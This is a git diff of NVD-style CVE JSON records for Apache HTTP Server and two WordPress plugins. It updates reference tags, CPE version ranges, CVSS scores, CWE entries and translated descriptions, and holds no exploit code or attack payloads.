"http://slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.470158", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "http://slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.685483", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102662-1", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102663-1", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "http://www-1.ibm.com/support/search.wss?rs=0&q=PK16139&apar=only", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "http://www-1.ibm.com/support/search.wss?rs=0&q=PK25355&apar=only", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "http://www.debian.org/security/2006/dsa-1167", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "http://www.gentoo.org/security/en/glsa/glsa-200602-03.xml", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "http://www.novell.com/linux/security/advisories/2006_43_apache.html", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "http://www.openpkg.org/security/OpenPKG-SA-2005.029-apache.txt", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "http://www.redhat.com/archives/fedora-announce-list/2006-January/msg00060.html", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "http://www.redhat.com/support/errata/RHSA-2006-0158.html", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "http://www.securityfocus.com/archive/1/425399/100/0/threaded", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory", + "VDB Entry" + ] }, { "url": "http://www.securityfocus.com/archive/1/445206/100/0/threaded", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory", + "VDB Entry" + ] }, { "url": "http://www.securityfocus.com/archive/1/450315/100/0/threaded", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory", + "VDB Entry" + ] }, { "url": "http://www.securityfocus.com/archive/1/450321/100/0/threaded", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory", + "VDB Entry" + ] }, { "url": "http://www.securityfocus.com/bid/15834", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory", + "VDB Entry" + ] }, { "url": "http://www.trustix.org/errata/2005/0074/", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "http://www.ubuntulinux.org/usn/usn-241-1", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "http://www.us-cert.gov/cas/techalerts/TA08-150A.html", "source": "secalert@redhat.com", "tags": [ + "Third Party Advisory", "US Government Resource" ] }, { "url": "http://www.vupen.com/english/advisories/2005/2870", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "http://www.vupen.com/english/advisories/2006/2423", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "http://www.vupen.com/english/advisories/2006/3995", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "http://www.vupen.com/english/advisories/2006/4015", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "http://www.vupen.com/english/advisories/2006/4300", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "http://www.vupen.com/english/advisories/2006/4868", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "http://www.vupen.com/english/advisories/2008/0924/references", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "http://www.vupen.com/english/advisories/2008/1246/references", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "http://www.vupen.com/english/advisories/2008/1697", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "http://wwwnew.mandriva.com/security/advisories?name=MDKSA-2006:007", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "https://lists.apache.org/thread.html/54a42d4b01968df1117cea77fc53d6beb931c0e05936ad02af93e9ac%40%3Ccvs.httpd.apache.org%3E", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "https://lists.apache.org/thread.html/5df9bfb86a3b054bb985a45ff9250b0332c9ecc181eec232489e7f79%40%3Ccvs.httpd.apache.org%3E", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "https://lists.apache.org/thread.html/r0276683d8e1e07153fc8642618830ac0ade85b9ae0dc7b07f63bb8fc%40%3Ccvs.httpd.apache.org%3E", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "https://lists.apache.org/thread.html/r2cb985de917e7da0848c440535f65a247754db8b2154a10089e4247b%40%3Ccvs.httpd.apache.org%3E", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "https://lists.apache.org/thread.html/r5419c9ba0951ef73a655362403d12bb8d10fab38274deb3f005816f5%40%3Ccvs.httpd.apache.org%3E", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "https://lists.apache.org/thread.html/r652fc951306cdeca5a276e2021a34878a76695a9f3cfb6490b4a6840%40%3Ccvs.httpd.apache.org%3E", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "https://lists.apache.org/thread.html/r75cbe9ea3e2114e4271bbeca7aff96117b50c1b6eb7c4772b0337c1f%40%3Ccvs.httpd.apache.org%3E", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "https://lists.apache.org/thread.html/r8828e649175df56f1f9e3919938ac7826128525426e2748f0ab62feb%40%3Ccvs.httpd.apache.org%3E", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "https://lists.apache.org/thread.html/r9e8622254184645bc963a1d47c5d47f6d5a36d6f080d8d2c43b2b142%40%3Ccvs.httpd.apache.org%3E", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "https://lists.apache.org/thread.html/r9f93cf6dde308d42a9c807784e8102600d0397f5f834890708bf6920%40%3Ccvs.httpd.apache.org%3E", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "https://lists.apache.org/thread.html/rafd145ba6cd0a4ced113a5823cdaff45aeb36eb09855b216401c66d6%40%3Ccvs.httpd.apache.org%3E", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "https://lists.apache.org/thread.html/rdca61ae990660bacb682295f2a09d34612b7bb5f457577fe17f4d064%40%3Ccvs.httpd.apache.org%3E", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "https://lists.apache.org/thread.html/reb542d2038e9c331506e0cbff881b47e40fbe2bd93ff00979e60cdf7%40%3Ccvs.httpd.apache.org%3E", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "https://lists.apache.org/thread.html/rf6449464fd8b7437704c55f88361b66f12d5b5f90bcce66af4be4ba9%40%3Ccvs.httpd.apache.org%3E", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10480", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Broken Link" + ] } ] } \ No newline at end of file diff --git a/CVE-2007/CVE-2007-44xx/CVE-2007-4465.json b/CVE-2007/CVE-2007-44xx/CVE-2007-4465.json index 36339f19c5d..df099bbe650 100644 --- a/CVE-2007/CVE-2007-44xx/CVE-2007-4465.json +++ b/CVE-2007/CVE-2007-44xx/CVE-2007-4465.json @@ -2,7 +2,7 @@ "id": "CVE-2007-4465", "sourceIdentifier": "cve@mitre.org", "published": "2007-09-14T00:17:00.000", - "lastModified": "2023-12-22T19:36:14.493", + "lastModified": "2024-01-19T15:13:13.213", "vulnStatus": "Analyzed", "descriptions": [ { @@ -330,7 +330,9 @@ "url": "http://www.securityfocus.com/archive/1/479237/100/0/threaded", "source": "cve@mitre.org", "tags": [ - "Broken Link" + "Broken Link", + "Third Party Advisory", + "VDB Entry" ] }, { diff --git a/CVE-2008/CVE-2008-29xx/CVE-2008-2939.json b/CVE-2008/CVE-2008-29xx/CVE-2008-2939.json index db9c5ad3229..08e7ab274b3 100644 --- a/CVE-2008/CVE-2008-29xx/CVE-2008-2939.json +++ b/CVE-2008/CVE-2008-29xx/CVE-2008-2939.json @@ -2,8 +2,8 @@ "id": "CVE-2008-2939", "sourceIdentifier": "secalert@redhat.com", "published": "2008-08-06T18:41:00.000", - "lastModified": "2023-02-13T02:19:16.490", - "vulnStatus": "Modified", + "lastModified": "2024-01-19T15:13:54.737", + "vulnStatus": "Analyzed", "descriptions": [ { "lang": "en", @@ -75,48 +75,10 @@ }, { "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:-:*:*:*:*:*:*:*", - "matchCriteriaId": "D623D8C0-65D2-4269-A1D4-5CB3899F44C8" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:2.2.0:*:*:*:*:*:*:*", - "matchCriteriaId": "67AD11FB-529C-404E-A13B-284F145322B8" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:2.2.1:*:*:*:*:*:*:*", - "matchCriteriaId": "733D62FE-180A-4AE8-9DBF-DA1DC18C1932" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:2.2.2:*:*:*:*:*:*:*", - "matchCriteriaId": "CCBBB7FE-35FC-4515-8393-5145339FCE4D" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:2.2.3:*:*:*:*:*:*:*", - "matchCriteriaId": "F519633F-AB68-495A-B85E-FD41F9F752CA" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:2.2.4:*:*:*:*:*:*:*", - "matchCriteriaId": "A894BED6-C97D-4DA4-A13D-9CB2B3306BC5" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:2.2.6:*:*:*:*:*:*:*", - "matchCriteriaId": "34A847D1-5AD5-4EFD-B165-7602AFC1E656" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:2.2.8:*:*:*:*:*:*:*", - "matchCriteriaId": "9AF3A0F5-4E5C-4278-9927-1F94F25CCAFC" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:2.2.9:*:*:*:*:*:*:*", - "matchCriteriaId": "AB63EBE5-CF14-491E-ABA5-67116DFE3E5B" + "criteria": "cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*", + "versionStartIncluding": "2.2.0", + "versionEndIncluding": "2.2.9", + "matchCriteriaId": "AAAFBA9B-793F-4B2A-89F5-2656C1278563" } ] } @@ -172,225 +134,445 @@ "references": [ { "url": "http://lists.apple.com/archives/security-announce/2009/May/msg00002.html", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Mailing List" + ] }, { "url": "http://lists.opensuse.org/opensuse-security-announce/2008-11/msg00000.html", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "http://marc.info/?l=bugtraq&m=123376588623823&w=2", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "http://marc.info/?l=bugtraq&m=125631037611762&w=2", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "http://rhn.redhat.com/errata/RHSA-2008-0967.html", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] + }, + { + "url": "http://secunia.com/advisories/31384", + "source": "secalert@redhat.com", + "tags": [ + "Broken Link" + ] + }, + { + "url": "http://secunia.com/advisories/31673", + "source": "secalert@redhat.com", + "tags": [ + "Broken Link" + ] + }, + { + "url": "http://secunia.com/advisories/32685", + "source": "secalert@redhat.com", + "tags": [ + "Broken Link" + ] + }, + { + "url": "http://secunia.com/advisories/32838", + "source": "secalert@redhat.com", + "tags": [ + "Broken Link" + ] + }, + { + "url": "http://secunia.com/advisories/33156", + "source": "secalert@redhat.com", + "tags": [ + "Broken Link" + ] + }, + { + "url": "http://secunia.com/advisories/33797", + "source": "secalert@redhat.com", + "tags": [ + "Broken Link" + ] + }, + { + "url": "http://secunia.com/advisories/34219", + "source": "secalert@redhat.com", + "tags": [ + "Broken Link" + ] + }, + { + "url": "http://secunia.com/advisories/35074", + "source": "secalert@redhat.com", + "tags": [ + "Broken Link" + ] }, { "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-247666-1", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Broken Link" + ] }, { "url": "http://support.apple.com/kb/HT3549", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "http://svn.apache.org/viewvc?view=rev&revision=682868", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "http://svn.apache.org/viewvc?view=rev&revision=682870", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "http://svn.apache.org/viewvc?view=rev&revision=682871", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "http://wiki.rpath.com/Advisories:rPSA-2008-0327", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Broken Link" + ] }, { "url": "http://wiki.rpath.com/wiki/Advisories:rPSA-2008-0328", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Broken Link" + ] }, { "url": "http://www-1.ibm.com/support/docview.wss?uid=swg1PK70197", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "http://www-1.ibm.com/support/docview.wss?uid=swg1PK70937", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "http://www.kb.cert.org/vuls/id/663763", "source": "secalert@redhat.com", "tags": [ + "Third Party Advisory", "US Government Resource" ] }, { "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2008:194", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Broken Link" + ] }, { "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2008:195", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Broken Link" + ] }, { "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2009:124", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Broken Link" + ] }, { "url": "http://www.rapid7.com/advisories/R7-0033", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Broken Link" + ] }, { "url": "http://www.redhat.com/support/errata/RHSA-2008-0966.html", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "http://www.securityfocus.com/archive/1/495180/100/0/threaded", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory", + "VDB Entry" + ] }, { "url": "http://www.securityfocus.com/archive/1/498566/100/0/threaded", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory", + "VDB Entry" + ] }, { "url": "http://www.securityfocus.com/archive/1/498567/100/0/threaded", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory", + "VDB Entry" + ] }, { "url": "http://www.securityfocus.com/bid/30560", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory", + "VDB Entry" + ] }, { "url": "http://www.securitytracker.com/id?1020635", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory", + "VDB Entry" + ] }, { "url": "http://www.ubuntu.com/usn/USN-731-1", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory", + "VDB Entry" + ] }, { "url": "http://www.us-cert.gov/cas/techalerts/TA09-133A.html", "source": "secalert@redhat.com", "tags": [ + "Third Party Advisory", "US Government Resource" ] }, { "url": "http://www.vupen.com/english/advisories/2008/2315", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Permissions Required" + ] }, { "url": "http://www.vupen.com/english/advisories/2008/2461", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Permissions Required" + ] }, { "url": "http://www.vupen.com/english/advisories/2009/0320", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Permissions Required" + ] }, { "url": "http://www.vupen.com/english/advisories/2009/1297", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Permissions Required" + ] }, { "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/44223", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "VDB Entry" + ] }, { "url": "https://lists.apache.org/thread.html/54a42d4b01968df1117cea77fc53d6beb931c0e05936ad02af93e9ac%40%3Ccvs.httpd.apache.org%3E", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "https://lists.apache.org/thread.html/5df9bfb86a3b054bb985a45ff9250b0332c9ecc181eec232489e7f79%40%3Ccvs.httpd.apache.org%3E", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "https://lists.apache.org/thread.html/8d63cb8e9100f28a99429b4328e4e7cebce861d5772ac9863ba2ae6f%40%3Ccvs.httpd.apache.org%3E", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "https://lists.apache.org/thread.html/f7f95ac1cd9895db2714fa3ebaa0b94d0c6df360f742a40951384a53%40%3Ccvs.httpd.apache.org%3E", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "https://lists.apache.org/thread.html/r0276683d8e1e07153fc8642618830ac0ade85b9ae0dc7b07f63bb8fc%40%3Ccvs.httpd.apache.org%3E", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "https://lists.apache.org/thread.html/r2cb985de917e7da0848c440535f65a247754db8b2154a10089e4247b%40%3Ccvs.httpd.apache.org%3E", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "https://lists.apache.org/thread.html/r57608dc51b79102f3952ae06f54d5277b649c86d6533dcd6a7d201f7%40%3Ccvs.httpd.apache.org%3E", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "https://lists.apache.org/thread.html/r5f9c22f9c28adbd9f00556059edc7b03a5d5bb71d4bb80257c0d34e4%40%3Ccvs.httpd.apache.org%3E", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "https://lists.apache.org/thread.html/r75cbe9ea3e2114e4271bbeca7aff96117b50c1b6eb7c4772b0337c1f%40%3Ccvs.httpd.apache.org%3E", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "https://lists.apache.org/thread.html/r7dd6be4dc38148704f2edafb44a8712abaa3a2be120d6c3314d55919%40%3Ccvs.httpd.apache.org%3E", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "https://lists.apache.org/thread.html/r84d043c2115176958562133d96d851495d712aa49da155d81f6733be%40%3Ccvs.httpd.apache.org%3E", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "https://lists.apache.org/thread.html/r8828e649175df56f1f9e3919938ac7826128525426e2748f0ab62feb%40%3Ccvs.httpd.apache.org%3E", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "https://lists.apache.org/thread.html/r9e8622254184645bc963a1d47c5d47f6d5a36d6f080d8d2c43b2b142%40%3Ccvs.httpd.apache.org%3E", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "https://lists.apache.org/thread.html/r9ea3538f229874c80a10af473856a81fbf5f694cd7f471cc679ba70b%40%3Ccvs.httpd.apache.org%3E", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "https://lists.apache.org/thread.html/r9f93cf6dde308d42a9c807784e8102600d0397f5f834890708bf6920%40%3Ccvs.httpd.apache.org%3E", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "https://lists.apache.org/thread.html/rb9c9f42dafa25d2f669dac2a536a03f2575bc5ec1be6f480618aee10%40%3Ccvs.httpd.apache.org%3E", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "https://lists.apache.org/thread.html/rc4c53a0d57b2771ecd4b965010580db355e38137c8711311ee1073a8%40%3Ccvs.httpd.apache.org%3E", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "https://lists.apache.org/thread.html/rdca61ae990660bacb682295f2a09d34612b7bb5f457577fe17f4d064%40%3Ccvs.httpd.apache.org%3E", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "https://lists.apache.org/thread.html/rf6449464fd8b7437704c55f88361b66f12d5b5f90bcce66af4be4ba9%40%3Ccvs.httpd.apache.org%3E", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "https://lists.apache.org/thread.html/rfbaf647d52c1cb843e726a0933f156366a806cead84fbd430951591b%40%3Ccvs.httpd.apache.org%3E", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11316", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Broken Link" + ] }, { "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A7716", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Broken Link" + ] } ] } \ No newline at end of file diff --git a/CVE-2021/CVE-2021-245xx/CVE-2021-24567.json b/CVE-2021/CVE-2021-245xx/CVE-2021-24567.json index 23926cf1c82..4468b7efb45 100644 --- a/CVE-2021/CVE-2021-245xx/CVE-2021-24567.json +++ b/CVE-2021/CVE-2021-245xx/CVE-2021-24567.json @@ -2,19 +2,80 @@ "id": "CVE-2021-24567", "sourceIdentifier": "contact@wpscan.com", "published": "2024-01-16T16:15:09.050", - "lastModified": "2024-01-16T23:12:38.473", - "vulnStatus": "Awaiting Analysis", + "lastModified": "2024-01-19T15:26:00.567", + "vulnStatus": "Analyzed", "descriptions": [ { "lang": "en", "value": "The Simple Post WordPress plugin through 1.1 does not sanitize user input when an authenticated user Text value, then it does not escape these values when outputting to the browser leading to an Authenticated Stored XSS Cross-Site Scripting issue." + }, + { + "lang": "es", + "value": "El complemento Simple Post WordPress hasta la versi\u00f3n 1.1 no sanitiza la entrada del usuario cuando un valor de texto de usuario autenticado, luego no escapa de estos valores cuando se env\u00eda al navegador, lo que genera un problema de cross site scripting (XSS) almacenado autenticado." + } + ], + "metrics": { + "cvssMetricV31": [ + { + "source": "nvd@nist.gov", + "type": "Primary", + "cvssData": { + "version": "3.1", + "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", + "attackVector": "NETWORK", + "attackComplexity": "LOW", + "privilegesRequired": "LOW", + "userInteraction": "REQUIRED", + "scope": "CHANGED", + "confidentialityImpact": "LOW", + "integrityImpact": "LOW", + "availabilityImpact": "NONE", + "baseScore": 5.4, + "baseSeverity": "MEDIUM" + }, + "exploitabilityScore": 2.3, + "impactScore": 2.7 + } + ] + }, + "weaknesses": [ + { + "source": "nvd@nist.gov", + "type": "Primary", + "description": [ + { + "lang": "en", + "value": "CWE-79" + } + ] + } + ], + "configurations": [ + { + "nodes": [ + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": true, + "criteria": "cpe:2.3:a:nickmomrik:simple_post:*:*:*:*:*:wordpress:*:*", + "versionEndIncluding": "1.1", + "matchCriteriaId": "303EC6DD-DD3A-4E54-AF9F-586A11905F54" + } + ] + } + ] } ], - "metrics": {}, "references": [ { "url": "https://wpscan.com/vulnerability/a3cd3115-2181-4e14-8b39-4de096433847/", - "source": "contact@wpscan.com" + "source": "contact@wpscan.com", + "tags": [ + "Exploit", + "Third Party Advisory" + ] } ] } \ No newline at end of file diff --git a/CVE-2021/CVE-2021-248xx/CVE-2021-24869.json b/CVE-2021/CVE-2021-248xx/CVE-2021-24869.json index c1d35bba77b..1bdf50de741 100644 --- a/CVE-2021/CVE-2021-248xx/CVE-2021-24869.json +++ b/CVE-2021/CVE-2021-248xx/CVE-2021-24869.json @@ -2,23 +2,87 @@ "id": "CVE-2021-24869", "sourceIdentifier": "contact@wpscan.com", "published": "2024-01-16T16:15:09.103", - "lastModified": "2024-01-16T23:12:38.473", - "vulnStatus": "Awaiting Analysis", + "lastModified": "2024-01-19T15:25:42.380", + "vulnStatus": "Analyzed", "descriptions": [ { "lang": "en", "value": "The WP Fastest Cache WordPress plugin before 0.9.5 does not escape user input in the set_urls_with_terms method before using it in a SQL statement, leading to an SQL injection exploitable by low privilege users such as subscriber" + }, + { + "lang": "es", + "value": "El complemento de WordPress WP Fastest Cache anterior a 0.9.5 no escapa a la entrada del usuario en el m\u00e9todo set_urls_with_terms antes de usarlo en una declaraci\u00f3n SQL, lo que lleva a una inyecci\u00f3n de SQL explotable por usuarios con pocos privilegios, como un suscriptor." + } + ], + "metrics": { + "cvssMetricV31": [ + { + "source": "nvd@nist.gov", + "type": "Primary", + "cvssData": { + "version": "3.1", + "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "attackVector": "NETWORK", + "attackComplexity": "LOW", + "privilegesRequired": "LOW", + "userInteraction": "NONE", + "scope": "UNCHANGED", + "confidentialityImpact": "HIGH", + "integrityImpact": "HIGH", + "availabilityImpact": "HIGH", + "baseScore": 8.8, + "baseSeverity": "HIGH" + }, + "exploitabilityScore": 2.8, + "impactScore": 5.9 + } + ] + }, + "weaknesses": [ + { + "source": "nvd@nist.gov", + "type": "Primary", + "description": [ + { + "lang": "en", + "value": "CWE-89" + } + ] + } + ], + "configurations": [ + { + "nodes": [ + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": true, + "criteria": "cpe:2.3:a:wpfastestcache:wp_fastest_cache:*:*:*:*:*:wordpress:*:*", + "versionEndExcluding": "0.9.5", + "matchCriteriaId": "C5057D35-B8BB-4AC3-ADCD-F89EA6099A95" + } + ] + } + ] } ], - "metrics": {}, "references": [ { "url": "https://jetpack.com/2021/10/14/multiple-vulnerabilities-in-wp-fastest-cache-plugin/", - "source": "contact@wpscan.com" + "source": "contact@wpscan.com", + "tags": [ + "Exploit", + "Third Party Advisory" + ] }, { "url": "https://wpscan.com/vulnerability/b2233795-1a32-45fc-9d51-b6bd0a073f5b/", - "source": "contact@wpscan.com" + "source": "contact@wpscan.com", + "tags": [ + "Third Party Advisory" + ] } ] 